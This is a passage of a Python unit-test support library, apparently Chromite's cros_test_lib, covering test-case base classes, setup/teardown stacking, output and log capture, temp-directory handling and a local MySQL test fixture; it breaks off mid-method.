pytestmark_network_test = null_decorator
pytestmark_skip = null_decorator
pytestmark_skipif = lambda condition, reason=None: None
Directory = collections.namedtuple('Directory', ['name', 'contents'])
class GlobalTestConfig(object):
"""Global configuration for tests."""
# By default, disable all network tests.
RUN_NETWORK_TESTS = False
UPDATE_GENERATED_FILES = False
NETWORK_TESTS_SKIPPED = 0
def NetworkTest(reason='Skipping network test (re-run w/--network)'):
"""Decorator for unit tests. Skip the test if --network is not specified."""
def Decorator(test_item):
@functools.wraps(test_item)
@pytestmark_network_test
def NetworkWrapper(*args, **kwargs):
if not GlobalTestConfig.RUN_NETWORK_TESTS:
GlobalTestConfig.NETWORK_TESTS_SKIPPED += 1
raise unittest.SkipTest(reason)
test_item(*args, **kwargs)
# We can't check GlobalTestConfig.RUN_NETWORK_TESTS here because
# __main__ hasn't run yet. Wrap each test so that we check the flag before
# running it.
if isinstance(test_item, type) and issubclass(test_item, TestCase):
test_item.setUp = Decorator(test_item.setUp)
return test_item
else:
return NetworkWrapper
return Decorator
def _FlattenStructure(base_path, dir_struct):
"""Converts a directory structure to a list of paths."""
flattened = []
for obj in dir_struct:
if isinstance(obj, Directory):
new_base = os.path.join(base_path, obj.name).rstrip(os.sep)
flattened.append(new_base + os.sep)
flattened.extend(_FlattenStructure(new_base, obj.contents))
else:
assert isinstance(obj, six.string_types)
flattened.append(os.path.join(base_path, obj))
return flattened
def CreateOnDiskHierarchy(base_path, dir_struct):
"""Creates on-disk representation of an in-memory directory structure.
Args:
base_path: The absolute root of the directory structure.
dir_struct: A recursively defined data structure that represents a
directory tree. The basic form is a list. Elements can be file names or
cros_test_lib.Directory objects. The 'contents' attribute of Directory
types is a directory structure representing the contents of the directory.
Examples:
- ['file1', 'file2']
- ['file1', Directory('directory', ['deepfile1', 'deepfile2']), 'file2']
"""
flattened = _FlattenStructure(base_path, dir_struct)
for f in flattened:
f = os.path.join(base_path, f)
if f.endswith(os.sep):
osutils.SafeMakedirs(f)
else:
osutils.Touch(f, makedirs=True)
def _VerifyDirectoryIterables(existing, expected):
"""Compare two iterables representing contents of a directory.
Paths in |existing| and |expected| will be compared for exact match.
Args:
existing: An iterable containing paths that exist.
expected: An iterable of paths that are expected.
Raises:
AssertionError when there is any divergence between |existing| and
|expected|.
"""
def FormatPaths(paths):
return '\n'.join(sorted(paths))
existing = set(existing)
expected = set(expected)
unexpected = existing - expected
if unexpected:
raise AssertionError('Found unexpected paths:\n%s'
% FormatPaths(unexpected))
missing = expected - existing
if missing:
raise AssertionError('These files were expected but not found:\n%s'
% FormatPaths(missing))
def VerifyOnDiskHierarchy(base_path, dir_struct):
"""Verify that an on-disk directory tree exactly matches a given structure.
Args:
base_path: See CreateOnDiskHierarchy()
dir_struct: See CreateOnDiskHierarchy()
Raises:
AssertionError when there is any divergence between the on-disk
structure and the structure specified by 'dir_struct'.
"""
expected = _FlattenStructure(base_path, dir_struct)
_VerifyDirectoryIterables(osutils.DirectoryIterator(base_path), expected)
def VerifyTarball(tarball, dir_struct):
"""Compare the contents of a tarball against a directory structure.
Args:
tarball: Path to the tarball.
dir_struct: See CreateOnDiskHierarchy()
Raises:
AssertionError when there is any divergence between the tarball and the
structure specified by 'dir_struct'.
"""
result = cros_build_lib.run(['tar', '-tf', tarball], capture_output=True,
encoding='utf-8')
contents = result.stdout.splitlines()
normalized = set()
for p in contents:
norm = os.path.normpath(p)
if p.endswith('/'):
norm += '/'
if norm in normalized:
raise AssertionError('Duplicate entry %r found in %r!' % (norm, tarball))
normalized.add(norm)
expected = _FlattenStructure('', dir_struct)
_VerifyDirectoryIterables(normalized, expected)
class StackedSetup(type):
"""Metaclass to simplify unit testing and make it more robust.
A metaclass alters the way that classes are initialized, enabling us to
modify the class dictionary prior to the class being created. We use this
feature here to modify the way that unit tests work a bit.
This class does three things:
1) When a test case is set up or torn down, we now run all setUp and
tearDown methods in the inheritance tree.
2) If a setUp or tearDown method fails, we still run tearDown methods
for any test classes that were partially or completely set up.
3) All test cases time out after TEST_CASE_TIMEOUT seconds.
Use by adding this line before a class:
@six.add_metaclass(StackedSetup)
Since cros_test_lib.TestCase uses this metaclass, all derivatives of TestCase
also inherit the above behavior (unless they override the metaclass attribute
manually).
"""
TEST_CASE_TIMEOUT = 10 * 60
def __new__(cls, clsname, bases, scope):
"""Generate the new class with pointers to original funcs & our helpers"""
if 'setUp' in scope:
scope['__raw_setUp__'] = scope.pop('setUp')
scope['setUp'] = cls._stacked_setUp
if 'tearDown' in scope:
scope['__raw_tearDown__'] = scope.pop('tearDown')
scope['tearDown'] = cls._stacked_tearDown
# Modify all test* methods to time out after TEST_CASE_TIMEOUT seconds.
timeout = scope.get('TEST_CASE_TIMEOUT', StackedSetup.TEST_CASE_TIMEOUT)
if timeout is not None:
for name, func in scope.items():
if name.startswith('test') and hasattr(func, '__call__'):
wrapper = timeout_util.TimeoutDecorator(timeout)
scope[name] = wrapper(func)
return type.__new__(cls, clsname, bases, scope)
@staticmethod
def _walk_mro_stacking(obj, attr, reverse=False):
"""Walk the stacked classes (python method resolution order)"""
iterator = iter if reverse else reversed
methods = (getattr(x, attr, None) for x in iterator(obj.__class__.__mro__))
seen = set()
for method in (x for x in methods if x):
method = getattr(method, 'im_func', method)
if method not in seen:
seen.add(method)
yield method
@staticmethod
def _stacked_setUp(obj):
"""Run all the setUp funcs; if any fail, run all the tearDown funcs"""
obj.__test_was_run__ = False
try:
for target in StackedSetup._walk_mro_stacking(obj, '__raw_setUp__'):
target(obj)
except:
# TestCase doesn't trigger tearDowns if setUp failed; thus
# manually force it ourselves to ensure cleanup occurs.
StackedSetup._stacked_tearDown(obj)
raise
# Now mark the object as fully setUp; this is done so that
# any last minute assertions in tearDown can know if they should
# run or not.
obj.__test_was_run__ = True
@staticmethod
def _stacked_tearDown(obj):
"""Run all the tearDown funcs; if any fail, we move on to the next one"""
exc_info = None
for target in StackedSetup._walk_mro_stacking(obj, '__raw_tearDown__',
True):
# pylint: disable=bare-except
try:
target(obj)
except:
# Preserve the exception, throw it after running
# all tearDowns; we throw just the first also. We suppress
# pylint's warning here since it can't understand that we're
# actually raising the exception, just in a nonstandard way.
if exc_info is None:
exc_info = sys.exc_info()
if exc_info:
# Chuck the saved exception, w/ the same TB from
# when it occurred.
six.reraise(exc_info[0], exc_info[1], exc_info[2])
class TruthTable(object):
"""Class to represent a boolean truth table, useful in unit tests.
If you find yourself testing the behavior of some function that should
basically follow the behavior of a particular truth table, then this class
can allow you to fully test that function without being overly verbose
in the unit test code.
The following usage is supported on a constructed TruthTable:
1) Iterate over input lines of the truth table, expressed as tuples of
bools.
2) Access a particular input line by index, expressed as a tuple of bools.
3) Access the expected output for a set of inputs.
For example, say function "Foo" in module "mod" should consists of the
following code:
def Foo(A, B, C):
return A and B and not C
In the unittest for Foo, do this:
def testFoo(self):
truth_table = cros_test_lib.TruthTable(inputs=[(True, True, True)])
for inputs in truth_table:
a, b, c = inputs
result = mod.Foo(a, b, c)
self.assertEqual(result, truth_table.GetOutput(inputs))
"""
class TruthTableInputIterator(object):
"""Class to support iteration over inputs of a TruthTable."""
def __init__(self, truth_table):
self.truth_table = truth_table
self.next_line = 0
def __iter__(self):
return self
def __next__(self):
if self.next_line < self.truth_table.num_lines:
self.next_line += 1
return self.truth_table.GetInputs(self.next_line - 1)
else:
raise StopIteration()
# Python 2 glue.
next = __next__
def __init__(self, inputs, input_result=True):
"""Construct a TruthTable from given inputs.
Args:
inputs: Iterable of input lines, each expressed as a tuple of bools.
Each tuple must have the same length.
input_result: The output intended for each specified input. For
truth tables that mostly output True it is more concise to specify
the false inputs and then set input_result to False.
"""
# At least one input required.
if not inputs:
raise ValueError('Inputs required to construct TruthTable.')
# Save each input tuple in a set. Also confirm that the length
# of each input tuple is the same.
self.dimension = len(inputs[0])
self.num_lines = pow(2, self.dimension)
self.expected_inputs = set()
self.expected_inputs_result = input_result
for input_vals in inputs:
if len(input_vals) != self.dimension:
raise ValueError('All TruthTable inputs must have same dimension.')
self.expected_inputs.add(input_vals)
# Start generator index at 0.
self.next_line = 0
def __len__(self):
return self.num_lines
def __iter__(self):
return self.TruthTableInputIterator(self)
def GetInputs(self, inputs_index):
"""Get the input line at the given input index.
Args:
inputs_index: Following must hold: 0 <= inputs_index < self.num_lines.
Returns:
Tuple of bools representing one line of inputs.
"""
if inputs_index >= 0 and inputs_index < self.num_lines:
line_values = []
# Iterate through each column in truth table. Any order will
# produce a valid truth table, but going backward through
# columns will produce the traditional truth table ordering.
# For 2-dimensional example: F,F then F,T then T,F then T,T.
for col in range(self.dimension - 1, -1, -1):
line_values.append(bool(inputs_index // pow(2, col) % 2))
return tuple(line_values)
raise ValueError('This truth table has no line at index %r.' % inputs_index)
def GetOutput(self, inputs):
"""Get the boolean output for the given inputs.
Args:
inputs: Tuple of bools, length must be equal to self.dimension.
Returns:
bool value representing truth table output for given inputs.
"""
if not isinstance(inputs, tuple):
raise TypeError('Truth table inputs must be specified as a tuple.')
if not len(inputs) == self.dimension:
raise ValueError('Truth table inputs must match table dimension.')
return self.expected_inputs_result == (inputs in self.expected_inputs)
class EasyAttr(dict):
"""Convenient class for simulating objects with attributes in tests.
An EasyAttr object can be created with any attributes initialized very
easily. Examples:
1) An object with .id=45 and .name="Joe":
testobj = EasyAttr(id=45, name="Joe")
2) An object with .title.text="Big" and .owner.text="Joe":
testobj = EasyAttr(title=EasyAttr(text="Big"), owner=EasyAttr(text="Joe"))
"""
__slots__ = ()
def __getattr__(self, attr):
try:
return self[attr]
except KeyError:
raise AttributeError(attr)
def __delattr__(self, attr):
try:
self.pop(attr)
except KeyError:
raise AttributeError(attr)
def __setattr__(self, attr, value):
self[attr] = value
def __dir__(self):
return list(self.keys())
class LogFilter(logging.Filter):
"""A simple log filter that intercepts log messages and stores them."""
def __init__(self):
logging.Filter.__init__(self)
self.messages = StringIO()
def filter(self, record):
self.messages.write(record.getMessage() + '\n')
# Return False to prevent the message from being displayed.
return False
class LoggingCapturer(object):
"""Captures all messages emitted by the logging module."""
def __init__(self, logger_name='', log_level=logging.DEBUG):
self._log_filter = LogFilter()
self._old_level = None
self._log_level = log_level
self.logger_name = logger_name
def __enter__(self):
self.StartCapturing()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.StopCapturing()
def StartCapturing(self):
"""Begin capturing logging messages."""
logger = logging.getLogger(self.logger_name)
self._old_level = logger.getEffectiveLevel()
logger.setLevel(self._log_level)
logger.addFilter(self._log_filter)
def StopCapturing(self):
"""Stop capturing logging messages."""
logger = logging.getLogger(self.logger_name)
logger.setLevel(self._old_level)
logger.removeFilter(self._log_filter)
@property
def messages(self):
return self._log_filter.messages.getvalue()
def LogsMatch(self, regex):
"""Checks whether the logs match a given regex."""
match = re.search(regex, self.messages, re.MULTILINE)
return match is not None
def LogsContain(self, msg):
"""Checks whether the logs contain a given string."""
return self.LogsMatch(re.escape(msg))
@six.add_metaclass(StackedSetup)
class TestCase(unittest.TestCase):
"""Basic chromite test case.
Provides sane setUp/tearDown logic so that tearDown is correctly cleaned up.
Takes care of saving/restoring process-wide settings like the environment so
that sub-tests don't have to worry about gettings this right.
Also includes additional assert helpers beyond python stdlib.
"""
# List of vars chromite is globally sensitive to and that should
# be suppressed for tests.
ENVIRON_VARIABLE_SUPPRESSIONS = ('CROS_CACHEDIR',)
# The default diff is limited to 8 rows (of 80 cols). Make this unlimited
# so we always see the output. If it's too much, people can use loggers or
# pagers to scroll.
maxDiff = None
def __init__(self, *args, **kwargs):
unittest.TestCase.__init__(self, *args, **kwargs)
# This is set to keep pylint from complaining.
self.__test_was_run__ = False
@staticmethod
def _CheckTestEnv(msg):
"""Sanity check the environment. https://crbug.com/1015450"""
# Note: We use print+sys.exit here instead of logging/Die because it might
# cause errors in tests that expect their own setUp to run before their own
# tearDown executes. By failing in the core funcs, we violate that.
st = os.stat('/')
if st.st_mode & 0o7777 != 0o755:
print('%s %s\nError: The root directory has broken permissions: %o\n'
'Fix with: sudo chmod 755 /' % (sys.argv[0], msg, st.st_mode),
file=sys.stderr)
sys.exit(1)
if st.st_uid or st.st_gid:
print('%s %s\nError: The root directory has broken ownership: %i:%i'
' (should be 0:0)\nFix with: sudo chown 0:0 /' %
(sys.argv[0], msg, st.st_uid, st.st_gid), file=sys.stderr)
sys.exit(1)
def setUp(self):
self._CheckTestEnv('%s.setUp' % (self.id(),))
self.__saved_env__ = os.environ.copy()
self.__saved_cwd__ = os.getcwd()
self.__saved_umask__ = os.umask(0o22)
for x in self.ENVIRON_VARIABLE_SUPPRESSIONS:
os.environ.pop(x, None)
# Force all log lines in tests to include ANSI color prefixes, since it can
# be configured per-user.
os.environ['NOCOLOR'] = 'no'
def tearDown(self):
self._CheckTestEnv('%s.tearDown' % (self.id(),))
osutils.SetEnvironment(self.__saved_env__)
os.chdir(self.__saved_cwd__)
os.umask(self.__saved_umask__)
def id(self):
"""Return a name that can be passed in via the command line."""
return '%s.%s' % (self.__class__.__name__, self._testMethodName)
def __str__(self):
"""Return a pretty name that can be passed in via the command line."""
return '[%s] %s' % (self.__module__, self.id())
def assertRaises2(self, exception, functor, *args, **kwargs):
"""Like assertRaises, just with checking of the exception.
Args:
exception: The expected exception type to intecept.
functor: The function to invoke.
args: Positional args to pass to the function.
kwargs: Optional args to pass to the function. Note we pull
exact_kls, msg, and check_attrs from these kwargs.
exact_kls: If given, the exception raise must be *exactly* that class
type; derivatives are a failure.
check_attrs: If given, a mapping of attribute -> value to assert on
the resultant exception. Thus if you wanted to catch a ENOENT, you
would do:
assertRaises2(EnvironmentError, func, args,
check_attrs={'errno': errno.ENOENT})
ex_msg: A substring that should be in the stringified exception.
msg: The error message to be displayed if the exception isn't raised.
If not given, a suitable one is defaulted to.
returns: The exception object.
"""
exact_kls = kwargs.pop('exact_kls', None)
check_attrs = kwargs.pop('check_attrs', {})
ex_msg = kwargs.pop('ex_msg', None)
msg = kwargs.pop('msg', None)
if msg is None:
msg = ("%s(*%r, **%r) didn't throw an exception"
% (functor.__name__, args, kwargs))
try:
functor(*args, **kwargs)
raise AssertionError(msg)
except exception as e:
if ex_msg:
self.assertIn(ex_msg, str(e))
if exact_kls:
self.assertEqual(e.__class__, exception)
bad = []
for attr, required in check_attrs.items():
self.assertTrue(hasattr(e, attr),
msg='%s lacks attr %s' % (e, attr))
value = getattr(e, attr)
if value != required:
bad.append('%s attr is %s, needed to be %s'
% (attr, value, required))
if bad:
raise AssertionError('\n'.join(bad))
return e
def assertExists(self, path, msg=None):
"""Make sure |path| exists"""
if os.path.exists(path):
return
if msg is None:
msg = ['path is missing: %s' % path]
while path != '/':
path = os.path.dirname(path)
if not path:
# If we're given something like "foo", abort once we get to "".
break
result = os.path.exists(path)
msg.append('\tos.path.exists(%s): %s' % (path, result))
if result:
msg.append('\tcontents: %r' % os.listdir(path))
break
msg = '\n'.join(msg)
raise self.failureException(msg)
def assertNotExists(self, path, msg=None):
"""Make sure |path| does not exist"""
if not os.path.exists(path):
return
if msg is None:
msg = 'path exists when it should not: %s' % (path,)
raise self.failureException(msg)
def assertStartsWith(self, s, prefix, msg=None):
"""Asserts that |s| starts with |prefix|.
This function should be preferred over assertTrue(s.startswith(prefix)) for
it produces better error failure message than the other.
"""
if s.startswith(prefix):
return
if msg is None:
msg = '%s does not starts with %s' % (s, prefix)
raise self.failureException(msg)
def assertEndsWith(self, s, suffix, msg=None):
"""Asserts that |s| ends with |suffix|.
This function should be preferred over assertTrue(s.endswith(suffix)) for
it produces better error failure message than the other.
"""
if s.endswith(suffix):
return
if msg is None:
msg = '%s does not starts with %s' % (s, suffix)
raise self.failureException(msg)
def GetSequenceDiff(self, seq1, seq2):
"""Get a string describing the difference between two sequences.
Args:
seq1: First sequence to compare.
seq2: Second sequence to compare.
Returns:
A string that describes how the two sequences differ.
"""
try:
self.assertSequenceEqual(seq1, seq2)
except AssertionError as ex:
return str(ex)
else:
return 'no differences'
# Upstream deprecated these in Python 3, but left them in Python 2.
# Deprecate them ourselves to help with migration. We can delete these
# once upstream drops them.
def _disable(deprecated, replacement): # pylint: disable=no-self-argument
def disable_func(*_args, **_kwargs):
raise RuntimeError('%s() is removed in Python 3; use %s() instead' %
(deprecated, replacement))
return disable_func
assertEquals = _disable('assertEquals', 'assertEqual')
assertNotEquals = _disable('assertNotEquals', 'assertNotEqual')
assertAlmostEquals = _disable('assertAlmostEquals', 'assertAlmostEqual')
assertNotAlmostEquals = _disable('assertNotAlmostEquals',
'assertNotAlmostEqual')
assert_ = _disable('assert_', 'assertTrue')
failUnlessEqual = _disable('failUnlessEqual', 'assertEqual')
failIfEqual = _disable('failIfEqual', 'assertNotEqual')
failUnlessAlmostEqual = _disable('failUnlessAlmostEqual', 'assertAlmostEqual')
failIfAlmostEqual = _disable('failIfAlmostEqual', 'assertNotAlmostEqual')
failUnless = _disable('failUnless', 'assertTrue')
failUnlessRaises = _disable('failUnlessRaises', 'assertRaises')
failIf = _disable('failIf', 'assertFalse')
# Python 3 renamed these.
if sys.version_info.major < 3:
assertCountEqual = unittest.TestCase.assertItemsEqual
assertRaisesRegex = unittest.TestCase.assertRaisesRegexp
assertRegex = unittest.TestCase.assertRegexpMatches
assertItemsEqual = _disable('assertItemsEqual', 'assertCountEqual')
assertRaisesRegexp = _disable('assertRaisesRegexp', 'assertRaisesRegex')
assertRegexpMatches = _disable('assertRegexpMatches', 'assertRegex')
class LoggingTestCase(TestCase):
"""Base class for logging capturer test cases."""
def AssertLogsMatch(self, log_capturer, regex, inverted=False):
"""Verifies a regex matches the logs."""
assert_msg = '%r not found in %r' % (regex, log_capturer.messages)
assert_fn = self.assertTrue
if inverted:
assert_msg = '%r found in %r' % (regex, log_capturer.messages)
assert_fn = self.assertFalse
assert_fn(log_capturer.LogsMatch(regex), msg=assert_msg)
def AssertLogsContain(self, log_capturer, msg, inverted=False):
"""Verifies a message is contained in the logs."""
return self.AssertLogsMatch(log_capturer, re.escape(msg), inverted=inverted)
class OutputTestCase(TestCase):
"""Base class for cros unit tests with utility methods."""
# These work with error output from operation module.
ERROR_MSG_RE = re.compile(r'^\033\[1;%dm(.+?)(?:\033\[0m)+$' %
(30 + terminal.Color.RED,), re.DOTALL)
WARNING_MSG_RE = re.compile(r'^\033\[1;%dm(.+?)(?:\033\[0m)+$' %
(30 + terminal.Color.YELLOW,), re.DOTALL)
def __init__(self, *args, **kwargs):
"""Base class __init__ takes a second argument."""
TestCase.__init__(self, *args, **kwargs)
self._output_capturer = None
def OutputCapturer(self, *args, **kwargs):
"""Create and return OutputCapturer object."""
self._output_capturer = outcap.OutputCapturer(*args, **kwargs)
return self._output_capturer
def _GetOutputCapt(self):
"""Internal access to existing OutputCapturer.
Raises RuntimeError if output capturing was never on.
"""
if self._output_capturer:
return self._output_capturer
raise RuntimeError('Output capturing was never turned on for this test.')
def _GenCheckMsgFunc(self, prefix_re, line_re):
"""Return boolean func to check a line given |prefix_re| and |line_re|."""
def _method(line):
if prefix_re:
# Prefix regexp will strip off prefix (and suffix) from line.
match = prefix_re.search(line)
if match:
line = match.group(1)
else:
return False
return line_re.search(line) if line_re else True
if isinstance(prefix_re, str):
prefix_re = re.compile(prefix_re)
if isinstance(line_re, str):
line_re = re.compile(line_re)
# Provide a description of what this function looks for in a line. Error
# messages can make use of this.
_method.description = None
if prefix_re and line_re:
_method.description = ('line matching prefix regexp %r then regexp %r' %
(prefix_re.pattern, line_re.pattern))
elif prefix_re:
_method.description = 'line matching prefix regexp %r' % prefix_re.pattern
elif line_re:
_method.description = 'line matching regexp %r' % line_re.pattern
else:
raise RuntimeError('Nonsensical usage of _GenCheckMsgFunc: '
'no prefix_re or line_re')
return _method
def _ContainsMsgLine(self, lines, msg_check_func):
return any(msg_check_func(ln) for ln in lines)
def _GenOutputDescription(self, check_stdout, check_stderr):
# Some extra logic to make an error message useful.
if check_stdout and check_stderr:
return 'stdout or stderr'
elif check_stdout:
return 'stdout'
elif check_stderr:
return 'stderr'
def _AssertOutputContainsMsg(self, check_msg_func, invert,
check_stdout, check_stderr):
assert check_stdout or check_stderr
lines = []
if check_stdout:
lines.extend(self._GetOutputCapt().GetStdoutLines())
if check_stderr:
lines.extend(self._GetOutputCapt().GetStderrLines())
result = self._ContainsMsgLine(lines, check_msg_func)
# Some extra logic to make an error message useful.
output_desc = self._GenOutputDescription(check_stdout, check_stderr)
if invert:
msg = ('expected %s to not contain %s,\nbut found it in:\n%s' %
(output_desc, check_msg_func.description, lines))
self.assertFalse(result, msg=msg)
else:
msg = ('expected %s to contain %s,\nbut did not find it in:\n%s' %
(output_desc, check_msg_func.description, lines))
self.assertTrue(result, msg=msg)
def AssertOutputContainsError(self, regexp=None, invert=False,
check_stdout=True, check_stderr=False):
"""Assert requested output contains at least one error line.
If |regexp| is non-null, then the error line must also match it.
If |invert| is true, then assert the line is NOT found.
Raises RuntimeError if output capturing was never on for this test.
"""
check_msg_func = self._GenCheckMsgFunc(self.ERROR_MSG_RE, regexp)
return self._AssertOutputContainsMsg(check_msg_func, invert,
check_stdout, check_stderr)
def AssertOutputContainsWarning(self, regexp=None, invert=False,
check_stdout=True, check_stderr=False):
"""Assert requested output contains at least one warning line.
If |regexp| is non-null, then the warning line must also match it.
If |invert| is true, then assert the line is NOT found.
Raises RuntimeError if output capturing was never on for this test.
"""
check_msg_func = self._GenCheckMsgFunc(self.WARNING_MSG_RE, regexp)
return self._AssertOutputContainsMsg(check_msg_func, invert,
check_stdout, check_stderr)
def AssertOutputContainsLine(self, regexp, invert=False,
check_stdout=True, check_stderr=False):
"""Assert requested output contains line matching |regexp|.
If |invert| is true, then assert the line is NOT found.
Raises RuntimeError if output capturing was never on for this test.
"""
check_msg_func = self._GenCheckMsgFunc(None, regexp)
return self._AssertOutputContainsMsg(check_msg_func, invert,
check_stdout, check_stderr)
def _AssertOutputEndsInMsg(self, check_msg_func,
check_stdout, check_stderr):
"""Pass if requested output(s) ends(end) with an error message."""
assert check_stdout or check_stderr
lines = []
if check_stdout:
stdout_lines = self._GetOutputCapt().GetStdoutLines(include_empties=False)
if stdout_lines:
lines.append(stdout_lines[-1])
if check_stderr:
stderr_lines = self._GetOutputCapt().GetStderrLines(include_empties=False)
if stderr_lines:
lines.append(stderr_lines[-1])
result = self._ContainsMsgLine(lines, check_msg_func)
# Some extra logic to make an error message useful.
output_desc = self._GenOutputDescription(check_stdout, check_stderr)
msg = ('expected %s to end with %s,\nbut did not find it in:\n%s' %
(output_desc, check_msg_func.description, lines))
self.assertTrue(result, msg=msg)
def AssertOutputEndsInError(self, regexp=None,
check_stdout=True, check_stderr=False):
"""Assert requested output ends in error line.
If |regexp| is non-null, then the error line must also match it.
Raises RuntimeError if output capturing was never on for this test.
"""
check_msg_func = self._GenCheckMsgFunc(self.ERROR_MSG_RE, regexp)
return self._AssertOutputEndsInMsg(check_msg_func,
check_stdout, check_stderr)
def AssertOutputEndsInWarning(self, regexp=None,
check_stdout=True, check_stderr=False):
"""Assert requested output ends in warning line.
If |regexp| is non-null, then the warning line must also match it.
Raises RuntimeError if output capturing was never on for this test.
"""
check_msg_func = self._GenCheckMsgFunc(self.WARNING_MSG_RE, regexp)
return self._AssertOutputEndsInMsg(check_msg_func,
check_stdout, check_stderr)
def AssertOutputEndsInLine(self, regexp,
check_stdout=True, check_stderr=False):
"""Assert requested output ends in line matching |regexp|.
Raises RuntimeError if output capturing was never on for this test.
"""
check_msg_func = self._GenCheckMsgFunc(None, regexp)
return self._AssertOutputEndsInMsg(check_msg_func,
check_stdout, check_stderr)
def FuncCatchSystemExit(self, func, *args, **kwargs):
"""Run |func| with |args| and |kwargs| and catch SystemExit.
Return tuple (return value or None, SystemExit number code or None).
"""
try:
returnval = func(*args, **kwargs)
return returnval, None
except SystemExit as ex:
exit_code = ex.args[0]
return None, exit_code
def AssertFuncSystemExitZero(self, func, *args, **kwargs):
"""Run |func| with |args| and |kwargs| catching SystemExit.
If the func does not raise a SystemExit with exit code 0 then assert.
"""
exit_code = self.FuncCatchSystemExit(func, *args, **kwargs)[1]
self.assertIsNot(exit_code, None,
msg='Expected system exit code 0, but caught none')
self.assertEqual(exit_code, 0,
msg=('Expected system exit code 0, but caught %d' %
exit_code))
def AssertFuncSystemExitNonZero(self, func, *args, **kwargs):
"""Run |func| with |args| and |kwargs| catching SystemExit.
If the func does not raise a non-zero SystemExit code then assert.
"""
exit_code = self.FuncCatchSystemExit(func, *args, **kwargs)[1]
self.assertIsNot(exit_code, None,
msg='Expected non-zero system exit code, but caught none')
self.assertNotEqual(exit_code, 0,
msg=('Expected non-zero system exit code, but caught %d'
% exit_code))
def AssertRaisesAndReturn(self, error, func, *args, **kwargs):
"""Like assertRaises, but return exception raised."""
try:
func(*args, **kwargs)
self.fail(msg='Expected %s but got none' % error)
except error as ex:
return ex
class TempDirTestCase(TestCase):
"""Mixin used to give each test a tempdir that is cleansed upon finish"""
# Whether to delete tempdir used by this test. cf: SkipCleanup.
DELETE = True
_NO_DELETE_TEMPDIR_OBJ = None
def __init__(self, *args, **kwargs):
TestCase.__init__(self, *args, **kwargs)
self.tempdir = None
self._tempdir_obj = None
@classmethod
def SkipCleanup(cls):
"""Leave behind tempdirs created by instances of this class.
Calling this function ensures that all future instances will leak their
temporary directories. Additionally, all future temporary directories will
be created inside one top level temporary directory, so that you can easily
blow them away when you're done.
Currently, this function is pretty stupid. You should call it *before*
creating any instances.
Returns:
Path to a temporary directory that contains all future temporary
directories created by instances of this class.
"""
cls.DELETE = False
cls._NO_DELETE_TEMPDIR_OBJ = osutils.TempDir(
prefix='chromite.test_no_cleanup',
set_global=True,
delete=cls.DELETE)
logging.info('%s requested to SkipCleanup. Will leak %s',
cls.__name__, cls._NO_DELETE_TEMPDIR_OBJ.tempdir)
return cls._NO_DELETE_TEMPDIR_OBJ.tempdir
def setUp(self):
self._tempdir_obj = osutils.TempDir(prefix='chromite.test', set_global=True,
delete=self.DELETE)
self.tempdir = self._tempdir_obj.tempdir
# We must use addCleanup here so that inheriting TestCase classes can use
# addCleanup with the guarantee that the tempdir will be cleand up _after_
# their addCleanup has run. TearDown runs before cleanup functions.
self.addCleanup(self._CleanTempDir)
def _CleanTempDir(self):
if self._tempdir_obj is not None:
self._tempdir_obj.Cleanup()
self._tempdir_obj = None
self.tempdir = None
def ExpectRootOwnedFiles(self):
"""Tells us that we may need to clean up root owned files."""
if self._tempdir_obj is not None:
self._tempdir_obj.SetSudoRm()
def assertFileContents(self, file_path, content):
"""Assert that the file contains the given content."""
self.assertExists(file_path)
read_content = osutils.ReadFile(file_path)
self.assertEqual(read_content, content)
def assertTempFileContents(self, file_path, content):
"""Assert that a file in the temp directory contains the given content."""
self.assertFileContents(os.path.join(self.tempdir, file_path), content)
def ReadTempFile(self, path):
"""Read a given file from the temp directory.
Args:
path: The path relative to the temp directory to read.
"""
return osutils.ReadFile(os.path.join(self.tempdir, path))
def WriteTempFile(self, path, content, **kwargs):
"""Write the given content to the temp directory
Args:
path: The path relative to the temp directory to write to.
content: Content to write. May be either an iterable, or a string.
kwargs: Additional args to pass to osutils.WriteFile.
"""
osutils.WriteFile(os.path.join(self.tempdir, path), content, **kwargs)
class LocalSqlServerTestCase(TempDirTestCase):
"""A TestCase that launches a local mysqld server in the background.
- This test must run insde the chroot.
- This class provides attributes:
- mysqld_host: The IP of the local mysqld server.
- mysqld_port: The port of the local mysqld server.
"""
# Neither of these are in the PATH for a non-sudo user.
MYSQL_INSTALL_DB = '/usr/share/mysql/scripts/mysql_install_db'
MYSQLD = '/usr/sbin/mysqld'
MYSQLD_SHUTDOWN_TIMEOUT_S = 30
def __init__(self, *args, **kwargs):
TempDirTestCase.__init__(self, *args, **kwargs)
self.mysqld_host = None
self.mysqld_port = None
self._mysqld_dir = None
self._mysqld_runner = None
# This class has assumptions about the mariadb installation that are only
# guaranteed to hold inside the chroot.
cros_build_lib.AssertInsideChroot()
def setUp(self):
"""Launch mysqld in a clean temp directory."""
self._mysqld_dir = os.path.join(self.tempdir, 'mysqld_dir')
osutils.SafeMakedirs(self._mysqld_dir)
mysqld_tmp_dir = os.path.join(self._mysqld_dir, 'tmp')
osutils.SafeMakedirs(mysqld_tmp_dir)
# MYSQL_INSTALL_DB is stupid. It can't parse '--flag value'.
# Must give it options in '--flag=value' form.
cmd = [
self.MYSQL_INSTALL_DB,
'--no-defaults',
'--basedir=/usr',
'--ldata=%s' % self._mysqld_dir,
]
cros_build_lib.run(cmd, quiet=True)
self.mysqld_host = '127.0.0.1'
self.mysqld_port = remote_access.GetUnusedPort()
cmd = [
self.MYSQLD,
'--no-defaults',
'--datadir', self._mysqld_dir,
'--socket', os.path.join(self._mysqld_dir, 'mysqld.socket'),
'--port', str(self.mysqld_port),
'--pid-file', os.path.join(self._mysqld_dir, 'mysqld.pid'),
'--tmpdir', mysqld_tmp_dir,
]
self._mysqld_runner = parallel.BackgroundTaskRunner(
cros_build_lib.run,
processes=1,
halt_on_error=True)
queue = self._mysqld_runner.__enter__()
queue.put((cmd,))
self.addCleanup(self._ShutdownMysqld)
# Ensure that the Sql server is up before continuing.
cmd = [
'mysqladmin',
'-S', os.path.join(self._mysqld_dir, 'mysqld.socket'),
'ping',
]
try:
# Retry at:
# 1 + 2 + 4 + 8 + 16 + 32 + 64 + 128 = 255 seconds total timeout in case
# of failure.
# Smaller timeouts make this check flaky on heavily loaded builders.
retry_util.RunCommandWithRetries(cmd=cmd, quiet=True, max_retry=8,
sleep=1, backoff_factor=2)
except Exception as e:
self.addCleanup(lambda: self._CleanupMysqld(
'mysqladmin failed to ping mysqld: %s' % e))
raise
def _ShutdownMysqld(self):
"""Cleanup mysqld and our mysqld data directory."""
if self._mysqld_runner is None:
return
try:
cmd = [
'mysqladmin',
